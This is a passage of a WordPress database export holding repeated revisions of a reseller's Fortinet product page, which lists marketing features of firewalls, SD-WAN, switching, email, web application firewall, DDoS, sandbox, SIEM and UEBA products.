FortiSwitch extends Security Fabric features to the Ethernet access layer.\r\n<ul>\r\n 	<li>\r\n<h5><strong>No Touch Provisioning and Management with FortiLink</strong></h5>\r\n</li>\r\n</ul>\r\nAuto discovery, Global VLAN and Security Policies, Firewall interfaces and Ethernet ports equally secure.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Highly Scalable</strong></h5>\r\n</li>\r\n</ul>\r\nBroad portfolio of stackable 1, 10, and 40 GE access ports with up to 100 GE uplinks to scale from desktop to datacenter.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Unparalleled Visibility</strong></h5>\r\n</li>\r\n</ul>\r\nSingle pane of glass management of both Security and Network Access, Device detection and port visibility.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enable voice, data, and wireless traffic across a single network</strong></h5>\r\n</li>\r\n</ul>\r\nPower network and IoT devices with POE, Auto provision using LLDP-MED.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Virtual Stacking</strong></h5>\r\n</li>\r\n</ul>\r\nFortiLink enables stacking across IDFs when managed, up to 300 switches based on FortiGate model.\r\n\r\n&nbsp;\r\n<h4>4.Â <strong>Email Security</strong></h4>\r\nEmail security remains a key productivity tool for today\'s organizations, as well as a successful attack vector for cyber criminals. FortiMail Email security utilizes the latest technologies and security services from FortiGuard Labs to deliver consistently top-rated protection from common and advanced threats while integrating robust data protection capabilities to avoid data loss.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Top-rated Antispam and Antiphishing</strong></h5>\r\n</li>\r\n</ul>\r\nMaintain productivity by shielding end users from unwanted spam and malicious phishing attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Independently certified advanced threat defense</strong></h5>\r\n</li>\r\n</ul>\r\nThwart cyber criminals intent on stealing data, holding systems for ransomware, conducting fraud, and other malicious purposes.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Integrated data protection</strong></h5>\r\n</li>\r\n</ul>\r\nMaintain the privacy of personal information and confidentiality of sensitive data in compliance with regulatory and corporate guidelines.\r\n<ul>\r\n 	<li>\r\n<h5><strong>High-performance mail handling</strong></h5>\r\n</li>\r\n</ul>\r\nSpeed the delivery of legitimate email at an affordable cost.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enterprise-class management</strong></h5>\r\n</li>\r\n</ul>\r\nFree staff and end users to drive the business by reducing time spent on email administration.\r\n\r\n&nbsp;\r\n<h2>APPLICATION SECURITY</h2>\r\n<ol>\r\n 	<li>\r\n<h4><strong>Web Application Firewall (WAF)</strong></h4>\r\n</li>\r\n</ol>\r\nUnprotected web applications are the easiest point of entry for hackers and vulnerable to a number of attack types. FortiWebâ€™s AI-enhanced and multi-layered approach protects your web apps from the OWASP Top 10 and more. When combined with our Web Application Security Service from FortiGuard Labs youâ€™re protected from the latest application vulnerabilities, bots, and suspicious URLs, and with dual machine learning detection engines your applications are safe from sophisticated threats such as SQL injection, cross-site scripting, buffer overflows, cookie poisoning, malicious sources, and DoS attacks.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Proven Web Application Protection</strong></h5>\r\n</li>\r\n</ul>\r\nFortiWeb protects against all the OWASP Top-10 threats, DDoS attacks and many others to defend your mission critical web-based applications.\r\n<ul>\r\n 	<li>\r\n<h5><strong>AI-based Threat Detection</strong></h5>\r\n</li>\r\n</ul>\r\nIn addition to regular signature updates and many other layers of defenses, FortiWebâ€™s AI-based, dual-layer machine learning engines protect against zero-day attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration with FortiGate firewalls and FortiSandbox deliver protection from advanced persistent threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Hardware-based Acceleration</strong></h5>\r\n</li>\r\n</ul>\r\nFortiWeb delivers industry-leading protected WAF throughputs and blazing fast secure traffic encryption/decryption.\r\n<ul>\r\n 	<li>\r\n<h5><strong>False Positive Mitigation Tools</strong></h5>\r\n</li>\r\n</ul>\r\nAdvanced tools that minimize the day-to-day management of policies and exception lists to ensure only unwanted traffic is blocked.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Advanced Visual Analytics</strong></h5>\r\n</li>\r\n</ul>\r\nFortiWebâ€™s visual reporting tools provide detailed analyses of attack sources, types and other elements that provide insights not available with other WAF solutions.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Application Delivery Controller</strong></h4>\r\nWith bandwidth demand growing faster than budgets and cyber-attacks constantly on the rise, it can be challenging to securely and efficiently deliver applications at the speed your users expect. Fortinet Application Delivery Controller (ADC) appliances optimize the availability, user experience, and scalability of enterprise application delivery. They enable fast, secure, and intelligent acceleration and distribution of even the most demanding enterprise applications.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Secure Traffic Management</strong></h5>\r\n</li>\r\n</ul>\r\nSSL offloading, forward proxy and visibility increase responsiveness and assist in scanning for threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Application Optimization</strong></h5>\r\n</li>\r\n</ul>\r\nSpeed web application delivery with compression, caching, HTTP 2.0, and HTTP Page Speed-UP.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nAV and Sandbox integration scans attachments to protect from the latest threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Global Server Load Balancing</strong></h5>\r\n</li>\r\n</ul>\r\nDistributes traffic across multiple geographical locations for disaster recovery.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Features</strong></h5>\r\n</li>\r\n</ul>\r\nWeb Application Firewall, Web Filtering, and IP Reputation for enhanced security.\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>DDoS</strong></h4>\r\nDistributed Denial of Service (DDoS) attacks are ever-evolving and use a variety of technologies. To successfully combat these attacks, you need a dynamic, multi-layered security solution. FortiDDoS protects from both known and zero day attacks with very low latency. Itâ€™s easy to deploy and manage, and includes comprehensive reporting and analysis tools.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>100% security processor (SPU)-based layer 3, 4, and 7 DDoS protection application-aware traffic management.</li>\r\n 	<li>Ability to monitor hundreds of thousands of parameters simultaneously.</li>\r\n 	<li>Behavior-based DDoS protection to eliminate need for signature files.</li>\r\n 	<li>Minimal false-positive detections through continuous threat evaluation.</li>\r\n 	<li>Attack protection for DNS services via specialized tools.</li>\r\n 	<li>Defense against every DDoS attack: bulk volumetric, layer 7 application, and SSL/HTTPS.</li>\r\n</ul>\r\n<h3></h3>\r\n<h2>THREAT DETECTION &amp; PREVENTION</h2>\r\n<h4><strong>Sandbox</strong></h4>\r\nWith the increasing volume and sophistication of cyber-attacks, it takes only one threat to slip through security for a data breach to occur. CISOs have adopted sandboxing as an essential component of their security strategies to help combat previously unknown threats. While attack surfaces are becoming more dynamic due to the rise of IoT and cloud-based services, a continuing shortage of cyber security talent is driving organizations to integrate sandboxing with greater controls and a high degree of automation.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad integration</strong></li>\r\n</ul>\r\nExtends advanced threat protection to your next-generation firewall, web application firewall, secure email gateway, and endpoint protection platform.\r\n<ul>\r\n 	<li><strong>Intelligent automation</strong></li>\r\n</ul>\r\nSpeeds mitigation by sharing real-time updates to disrupt threats at the origin and subsequent immunization across the entire organization and the global community.\r\n<ul>\r\n 	<li><strong>All-in-one</strong></li>\r\n</ul>\r\nSimplifies deployment and reduces complexity by covering all protocols in a single common sandbox platform.\r\n<ul>\r\n 	<li><strong>Flexible deployment</strong></li>\r\n</ul>\r\nAvailable as a physical or virtual appliance on premises, as well as a cloud-based or managed service.\r\n<ul>\r\n 	<li><strong>Open extensibility</strong></li>\r\n</ul>\r\nFlexible APIs for easy third-party integration and available day-zero integration with Fabric-Ready partners.\r\n\r\n2.Â <strong>FortiSIEM</strong>\r\n\r\nSecurity management only gets more complex. Endpoints, IoT, Infrastructure, Security Tools, Applications, VMâ€™s and Cloud â€“ the number of things you need to secure and monitor grows constantly. FortiSIEM â€“ Fortinetâ€™s Multivendor Security Incident and Events Management solution brings it all together. Visibility, Correlation, Automated Response and Remediation in a single, scalable solution. Using a Business Services view, the complexity of managing network and security operations is reduced, freeing resources, improving breach detection. Worldwide 80% of breaches go undetected because of skills shortage and event information â€˜noiseâ€™. FortiSIEM provides the cross correlation, applies machine learning and UEBA to improve response, to stop breaches before they occur.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Asset Self-Discovery</strong></h5>\r\n</li>\r\n</ul>\r\nVisibility needs to be both comprehensive and granular â€“ understanding a devices contextual capabilities and vulnerabilities reduces false positives.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Rapid Integrations and Scalability</strong></h5>\r\n</li>\r\n</ul>\r\nNetwork aware and security tool agnostic operations and management get a real-time business view of availability, utilization and security posture.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Automated Workflow</strong></h5>\r\n</li>\r\n</ul>\r\nA leading SOAR (Security Orchestration and Automated Response engine) the FortiSIEM Remediation Library responds to threats with the security tools you have today, and will grow with your enterprise.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Unified Platform</strong></h5>\r\n</li>\r\n</ul>\r\nMulti-tenancy for role-based access to a unified platform. Of benefit to MSPâ€™s and Enterprise customers alike â€“ deliver services and reports to a customer or a report. Share actionable intelligence and deliver value without compromise.\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>User and Entity Behavior Analytics (UEBA)</strong></h4>\r\nFortinet User and Entity Behavior Analytics (UEBA) technology protects organizations from insider threats by continuously monitoring users and endpoints with automated detection and response capabilities. Leveraging machine learning and advanced analytics, Fortinet UEBA automatically identifies non-compliant, suspicious, or anomalous behavior and rapidly alerts any compromised user accounts. This proactive approach to threat detection delivers an additional layer of protection and visibility, whether users are on or off the corporate network.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Augmented Intelligence (AI)</strong></li>\r\n</ul>\r\nEnhanced data visibility with machine learning and UEBA to identify threats.\r\n<ul>\r\n 	<li><strong>Rapid Threat Detection</strong></li>\r\n</ul>\r\nAI optimizes each stage of the threat investigation pipeline, shining a light on the unknown.\r\n<ul>\r\n 	<li><strong>Regulatory Compliance Support</strong></li>\r\n</ul>\r\nSupport regulatory compliance with a dedicated reporting tool, to respond to and manage potential non-compliant activity.\r\n<ul>\r\n 	<li><strong>Data Security</strong></li>\r\n</ul>\r\nMonitor data movement and endpoint activity 24/7 regardless of location or device, whether users are on or off your network.\r\n<ul>\r\n 	<li><strong>Forensic-level Reporting</strong></li>\r\n</ul>\r\nCompile a full forensic history of user behavior, enabling thorough forensics investigation and detailed reporting.\r\n<ul>\r\n 	<li><strong>Valuable Insights</strong></li>\r\n</ul>\r\nAnalyze data and deliver valuable insights, allowing your team to contain insider threats and respond in real time.\r\n\r\n[maxbutton id=\"1\" ]','Fortinet','','inherit','closed','closed','','1474-revision-v1','','','2019-09-30 14:19:52','2019-09-30 06:19:52','',1474,'https://bintara.com.my/blog/2019/09/30/1474-revision-v1/',0,'revision','',0),(3559,1,'2019-09-30 13:01:31','2019-09-30 05:01:31','<strong style=\"font-size: 2em; color: #000;\">Fortinet</strong> provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our uniqueÂ security fabricÂ combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration.\r\n\r\nFortiGate is available in a wide range of sizes and form factors to fit any environment and provides a broad array of next-generation security and networking functions. Complementary products can be deployed with a FortiGate to enable a simplified, end-to-end security infrastructure covering:\r\n<ul>\r\n 	<li>Network security</li>\r\n 	<li>Multi-Cloud security</li>\r\n 	<li>Web Application Security</li>\r\n 	<li>Email security</li>\r\n 	<li>Advanced Threat Protection</li>\r\n 	<li>Secure Unified Access</li>\r\n 	<li>Endpoint security</li>\r\n 	<li>Management and Analytics</li>\r\n</ul>\r\n&nbsp;\r\n<h2><strong>NETWORK SECURITY</strong></h2>\r\n<h4>1. Next Generation Firewall (NGFW)</h4>\r\nFortiGate enterprise firewalls offer flexible deployments from the network edge to the core, data center, internal segment, and the Cloud. FortiGate enterprise firewalls leverages purpose-built security processors (SPUs) that delivers scalable performance of advanced security services like Threat Protection, SSL inspection, and ultra-low latency for protecting internal segments and mission critical environments.\r\n<h5></h5>\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>High-performance threat protection</strong></h5>\r\n</li>\r\n</ul>\r\nIndustry\'s highest threat protection and SSL inspection performance to protect from malware attacks hiding in encrypted traffic.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Validated security effectiveness</strong></h5>\r\n</li>\r\n</ul>\r\nIndependently certified and continuous threat intelligence updates provide robust protection from known and unknown attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Protect mission critical applications</strong></h5>\r\n</li>\r\n</ul>\r\nHighly scalable segmentation and ultra-low latency to protect network segments.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Continuous risk assessment via automation</strong></h5>\r\n</li>\r\n</ul>\r\nLeverage automated workflow and auditing features to deal with scarce security staff and continuously maintain compliance posture.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntelligently share threats across the entire digital attack surface to provide quick and automated protection.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enterprise class security management</strong></h5>\r\n</li>\r\n</ul>\r\nDeliver consistent security policy -- Single pane-of-glass to manage security assets irrespective of location and form factor.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Secure SD-WAN</strong></h4>\r\nFortinet is the only NGFW vendor to provide native SD-WAN along with integrated advanced threat protection. Fortinet, has received the â€œRecommendedâ€ rating for the first ever test conducted by NSS Labs for Software-Defined Wide Area Networking. Fortinet delivered excellent quality of experience for voice and video, high VPN throughput and best price/performance. FortiGate SD-WAN replaces separate WAN routers, WAN optimization, and security devices with a single solution that is application-aware, offers automatic WAN path control and multi-broadband support. It improves application performance, reduces WAN Operating expenses and minimizes management complexity.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>Application aware solution, support a broad range of 3000+ applications as well as granular visibility into sub-applications.</li>\r\n 	<li>Path awareness intelligence to monitor application-level transactions, and dynamically failover to the best available path.</li>\r\n 	<li>Single-pane-of-glass management simplifies deployment, management and monitoring of SD-WAN devices.</li>\r\n 	<li>Reduced complexity and high total cost of ownership by using best of breed SD-WAN and NGFW functionality on a single appliance.</li>\r\n 	<li>Improve cloud application performance by prioritizing business critical applications and enabling branches to directly communicate to the internet.</li>\r\n 	<li>Reduce operating expenses by migrating from MPLS and utilizing multi-broadband such as Ethernet, DSL, and LTE.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>3.Â <strong>IPS</strong></h4>\r\nWhether part of a firewall solution or a separate standalone appliance, Intrusion Prevention Systems (IPS) technology is becoming an increasingly ubiquitous part of network security defenses. Fortinet, well known for its next-generation firewall (NGFW) solution, has built IPS technology for more than ten years. Fortinet customers expect and depend on high performance from FortiGate firewalls and FortiGate IPS benefits from this legacy, delivering pound-for-pound, the best IPS performance available in the market today. FortiGate IPS, following a different evolution path than traditional IPS, innovates in ways that other standalone IPS products do not.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>World-class Protection</strong></h5>\r\n</li>\r\n</ul>\r\nDeep inspection for advanced threats, botnets, zero days and targeted attacks on the network.\r\n<ul>\r\n 	<li>\r\n<h5><strong>High performance</strong></h5>\r\n</li>\r\n</ul>\r\nInnovative security processor (SPU) technology for high-performance network throughput and deep security inspection.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Advanced threat protection</strong></h5>\r\n</li>\r\n</ul>\r\nSeamless integration â€“ appliance or cloud service â€“ with world-class sandboxing for advanced threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration and automation with Fortinetâ€™s broad product portfolio and partner ecosystem.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Data leak protection</strong></h5>\r\n</li>\r\n</ul>\r\nFile protection controls to prevent sensitive data exfiltration.\r\n\r\n&nbsp;\r\n<h4>4.Â <strong>Crypto VPNs</strong></h4>\r\nMaintaining uniform security policy for all corporate users, applications, devices irrespective of their location and appropriate access control is essential to providing security in a multi-cloud environment. The data in motion must be protected using mutual authentication and confidentiality to protect sensitive corporate data over unprotected networks and provides a defensible proof of security.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Hardware assisted encryption</strong></h5>\r\n</li>\r\n</ul>\r\nPrevent breaches and secure data in transit at a very high speed.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Scalable Security</strong></h5>\r\n</li>\r\n</ul>\r\nScalable security that is seamlessly integrated with routing.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Comprehensive data communications security</strong></h5>\r\n</li>\r\n</ul>\r\nProtects Application to Application, User to Users, User to Machine, Machine to Machine communication.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Diverse VPNs</strong></h5>\r\n</li>\r\n</ul>\r\nIPsec or SSL based diverse VPNs to offer flexible secure network choices.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nShare FortiTelemetry information across site-to-site tunnels with required confidentiality.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Unified Management</strong></h5>\r\n</li>\r\n</ul>\r\nSimplified, easy-to-manage, single pane of glass to manage large scale crypto VPNs, Routing and NGFW.\r\n\r\n&nbsp;\r\n<h4>5.Â <strong>Secure Web Gateway (SWG)</strong></h4>\r\nFortinet firewalls with Gateway Security protects enterprises against web attacks with URL filtering, visibility and control of encrypted web traffic via SSL inspection, and application of granular web application policies. Fortinet is the first and only gateway security vendor to earn Virus Bulletinâ€™s VBWeb certification for web filtering effectiveness.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>Feature-rich product that consolidates NGFW and SWG services.</li>\r\n 	<li>Powerful hardware that can perform SSL deep inspection.</li>\r\n 	<li>Anti-malware techniques updated with the latest threat intelligence.</li>\r\n 	<li>Reduce security teamâ€™s workload by providing a single pane of glass management for both NGFW and SWG.</li>\r\n 	<li>Effectively remove blind spots in encrypted traffic, without compromising on performance.</li>\r\n 	<li>Stay protected against the latest known and unknown internet-borne attacks.</li>\r\n</ul>\r\n&nbsp;\r\n<h4><strong>6.Â Management &amp; Reporting</strong></h4>\r\nSecurity teams globally are challenged by resource constraints, both in terms of the number of staff and raw security talent. Moreover, security teams are asked to do more, often in more complex networks and with growing numbers of alerts from multiple systems. Successful security teams allay these challenges by implementing three best practices. First, they simplify the way view management, combining operation NOC-style views with security-based SOC context. Second, they regularly measure and score their security effectiveness, enabling them anytime to answer how secure they are. Third, they demand deep integration so they can automate repetitive actions, especially across silos when possible.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Operationalized Visibility</strong></h5>\r\n</li>\r\n</ul>\r\nBig picture perspective allows you to see the forest through the tree.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Cross Silo Automation</strong></h5>\r\n</li>\r\n</ul>\r\nDeeper than mere integration, orchestrate workflow responses to triggered security events.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Simplified Management</strong></h5>\r\n</li>\r\n</ul>\r\nStreamline deployment and management, reducing task time and improving response time.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Rapid Detection</strong></h5>\r\n</li>\r\n</ul>\r\nConsolidate telemetry and alerts to uncover patterns and discover security insights.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Fortinet Fabric</strong></h5>\r\n</li>\r\n</ul>\r\nCentralized control over all of your Fortinet network assets.\r\n<h3></h3>\r\n<h2>INFRASTRUCTURE PROTECTION</h2>\r\n<ol>\r\n 	<li>\r\n<h4><strong>Endpoint Protection</strong></h4>\r\n</li>\r\n</ol>\r\nEndpoints are frequently the target of initial compromise or attacks. FortiClient strengthens endpoint security through integrated visibility, control, and proactive defense. With the ability to discover, monitor, and assess endpoint risks, you can ensure endpoint compliance, mitigate risks, and reduce exposure. FortiClient proactively defends against advanced attacks. Its tight integration with the Security Fabric enables policy-based automation to contain threats and control outbreaks. FortiClient is compatible with Fabric-Ready partners to further strengthen enterprisesâ€™ security posture.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Broad endpoint visibility</strong></h5>\r\n</li>\r\n</ul>\r\nFortiClient Fabric Agent integrates endpoints into the Security Fabric and provides endpoint telemetry, including user identity, protection status, risk scores, unpatched vulnerabilities, security events, and more.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Proactive endpoint defense</strong></h5>\r\n</li>\r\n</ul>\r\nAnti-exploit, sandbox integration, and behavior and pattern-based malware detection proactively detect and block malware, malicious scripts, document-based, and other advanced attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Automated threat containment</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration with the Security Fabric enables automated response. Mitigate unpatched vulnerabilities, alert users, and quarantine risky or compromised endpoints to stem an outbreak.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Secure remote access</strong></h5>\r\n</li>\r\n</ul>\r\nReliable, simple, and secure remote access with built-in, always-on VPN, with the added security of two-factor authentication, plus single-sign-on capabilities.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Easy to deploy and manage</strong></h5>\r\n</li>\r\n</ul>\r\nEasy to deploy and manage Modular and light-weight endpoint agents are centrally managed with the Enterprise Manager Server (EMS). Fabric Agent is compatible with Fabric-Ready endpoint security solutions.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Wireless</strong></h4>\r\nFortinet provides a full suite of Wi-Fi Access Point and WLAN Controller products as part of our Secure Access solution designed to address the unique requirements of every organization. For assistance choosing an AP, our AP Product selector can be found here. Configuration and control of your wireless environment can be done directly with a FortiGate or via our dedicated Wireless LAN controllers. Fortinet also offers FortiManager and FortiCloud as management solutions for the entire Fortinet security fabric. All Fortinetâ€™s wireless solutions integrate with our location analytics platform: FortiPresence. This enables real-time locationing and device tracking.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration with FortiGate firewalls extends your security fabric out to the edge of the network.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Superior density, scalability and mobilit</strong><strong>y</strong></h5>\r\n</li>\r\n</ul>\r\nHandle even the most complex RF environments.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Zero-touch deployment</strong></h5>\r\n</li>\r\n</ul>\r\nFast and simple deployment with no requirements for onsite tech support.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Simplified deployment and capacity expansion</strong></h5>\r\n</li>\r\n</ul>\r\nNo licenses to manage, just plug and go.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Free location and analytics</strong></h5>\r\n</li>\r\n</ul>\r\nWireless device locationing tools included with no additional licenses required.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Scalability from 1 to 10,000 APs</strong></h5>\r\n</li>\r\n</ul>\r\nA range of platforms for any sized deployment.\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>Switching</strong></h4>\r\nLegacy Ethernet LANs face many challenges including exponential growth in devices and applications, increased throughput demands from wireless LANs, and complex security implementations. Rather than asking how to secure traditional Ethernet LANs, Fortinet takes a security centric approach offering Ethernet as an extension of the security infrastructure through FortiSwitch and FortiLink. FortiSwitch offers a broad portfolio of secure, simple, and scalable Ethernet switches for applications that range from desktop to data center.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration with FortiLink</strong></h5>\r\n</li>\r\n</ul>\r\nFortiGate management of FortiSwitch extends Security Fabric features to the Ethernet access layer.\r\n<ul>\r\n 	<li>\r\n<h5><strong>No Touch Provisioning and Management with FortiLink</strong></h5>\r\n</li>\r\n</ul>\r\nAuto discovery, Global VLAN and Security Policies, Firewall interfaces and Ethernet ports equally secure.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Highly Scalable</strong></h5>\r\n</li>\r\n</ul>\r\nBroad portfolio of stackable 1, 10, and 40 GE access ports with up to 100 GE uplinks to scale from desktop to datacenter.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Unparalleled Visibility</strong></h5>\r\n</li>\r\n</ul>\r\nSingle pane of glass management of both Security and Network Access, Device detection and port visibility.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enable voice, data, and wireless traffic across a single network</strong></h5>\r\n</li>\r\n</ul>\r\nPower network and IoT devices with POE, Auto provision using LLDP-MED.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Virtual Stacking</strong></h5>\r\n</li>\r\n</ul>\r\nFortiLink enables stacking across IDFs when managed, up to 300 switches based on FortiGate model.\r\n\r\n&nbsp;\r\n<h4>4.Â <strong>Email Security</strong></h4>\r\nEmail security remains a key productivity tool for today\'s organizations, as well as a successful attack vector for cyber criminals. FortiMail Email security utilizes the latest technologies and security services from FortiGuard Labs to deliver consistently top-rated protection from common and advanced threats while integrating robust data protection capabilities to avoid data loss.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Top-rated Antispam and Antiphishing</strong></h5>\r\n</li>\r\n</ul>\r\nMaintain productivity by shielding end users from unwanted spam and malicious phishing attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Independently certified advanced threat defense</strong></h5>\r\n</li>\r\n</ul>\r\nThwart cyber criminals intent on stealing data, holding systems for ransomware, conducting fraud, and other malicious purposes.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Integrated data protection</strong></h5>\r\n</li>\r\n</ul>\r\nMaintain the privacy of personal information and confidentiality of sensitive data in compliance with regulatory and corporate guidelines.\r\n<ul>\r\n 	<li>\r\n<h5><strong>High-performance mail handling</strong></h5>\r\n</li>\r\n</ul>\r\nSpeed the delivery of legitimate email at an affordable cost.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enterprise-class management</strong></h5>\r\n</li>\r\n</ul>\r\nFree staff and end users to drive the business by reducing time spent on email administration.\r\n\r\n&nbsp;\r\n<h2>APPLICATION SECURITY</h2>\r\n<ol>\r\n 	<li>\r\n<h4><strong>Web Application Firewall (WAF)</strong></h4>\r\n</li>\r\n</ol>\r\nUnprotected web applications are the easiest point of entry for hackers and vulnerable to a number of attack types. FortiWebâ€™s AI-enhanced and multi-layered approach protects your web apps from the OWASP Top 10 and more. When combined with our Web Application Security Service from FortiGuard Labs youâ€™re protected from the latest application vulnerabilities, bots, and suspicious URLs, and with dual machine learning detection engines your applications are safe from sophisticated threats such as SQL injection, cross-site scripting, buffer overflows, cookie poisoning, malicious sources, and DoS attacks.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Proven Web Application Protection</strong></h5>\r\n</li>\r\n</ul>\r\nFortiWeb protects against all the OWASP Top-10 threats, DDoS attacks and many others to defend your mission critical web-based applications.\r\n<ul>\r\n 	<li>\r\n<h5><strong>AI-based Threat Detection</strong></h5>\r\n</li>\r\n</ul>\r\nIn addition to regular signature updates and many other layers of defenses, FortiWebâ€™s AI-based, dual-layer machine learning engines protect against zero-day attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration with FortiGate firewalls and FortiSandbox deliver protection from advanced persistent threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Hardware-based Acceleration</strong></h5>\r\n</li>\r\n</ul>\r\nFortiWeb delivers industry-leading protected WAF throughputs and blazing fast secure traffic encryption/decryption.\r\n<ul>\r\n 	<li>\r\n<h5><strong>False Positive Mitigation Tools</strong></h5>\r\n</li>\r\n</ul>\r\nAdvanced tools that minimize the day-to-day management of policies and exception lists to ensure only unwanted traffic is blocked.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Advanced Visual Analytics</strong></h5>\r\n</li>\r\n</ul>\r\nFortiWebâ€™s visual reporting tools provide detailed analyses of attack sources, types and other elements that provide insights not available with other WAF solutions.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Application Delivery Controller</strong></h4>\r\nWith bandwidth demand growing faster than budgets and cyber-attacks constantly on the rise, it can be challenging to securely and efficiently deliver applications at the speed your users expect. Fortinet Application Delivery Controller (ADC) appliances optimize the availability, user experience, and scalability of enterprise application delivery. They enable fast, secure, and intelligent acceleration and distribution of even the most demanding enterprise applications.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Secure Traffic Management</strong></h5>\r\n</li>\r\n</ul>\r\nSSL offloading, forward proxy and visibility increase responsiveness and assist in scanning for threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Application Optimization</strong></h5>\r\n</li>\r\n</ul>\r\nSpeed web application delivery with compression, caching, HTTP 2.0, and HTTP Page Speed-UP.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nAV and Sandbox integration scans attachments to protect from the latest threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Global Server Load Balancing</strong></h5>\r\n</li>\r\n</ul>\r\nDistributes traffic across multiple geographical locations for disaster recovery.\r\n<ul>\r\n 	